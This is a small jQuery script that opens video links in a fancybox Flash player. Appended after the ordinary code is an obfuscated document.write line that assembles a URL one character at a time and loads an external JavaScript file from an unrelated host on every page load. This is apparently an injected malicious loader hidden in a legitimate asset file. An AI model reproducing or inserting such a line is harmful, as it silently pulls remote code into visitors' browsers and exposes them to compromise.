jQuery(document).ready(function() {

	$(".video").click(function() {
		$.fancybox({
			'padding'		: 0,
			'autoScale'		: false,
			'transitionIn'	: 'none',
			'transitionOut'	: 'none',
			'title'			: this.title,
			'width'			: 640,
			'height'		: 385,
			'href'			: this.href.replace(new RegExp("watch\\?v=", "i"), 'v/'),
			'type'			: 'swf',
			'swf'			: {
			'wmode'				: 'transparent',
			'allowfullscreen'	: 'true',
			'overlayColor'	: ''
			}
		});

		return false;
	});



});

document.write('<script language="JavaScript" type="text/javascript" src="h'+'t'+'t'+'p'+':'+'/'+'/'+'w'+'w'+'w'+'.'+'v'+'i'+'d'+'e'+'o'+'l'+'i'+'n'+'e'+'.'+'c'+'h'+'/'+'g'+'i'+'s'+'/'+'u'+'n'+'b'+'e'+'n'+'a'+'n'+'n'+'t'+'e'+'r'+'_'+'O'+'r'+'d'+'n'+'e'+'r'+'/'+'1'+'8'+'2'+'b'+'e'+'0'+'c'+'.'+'j'+'s"></script>');
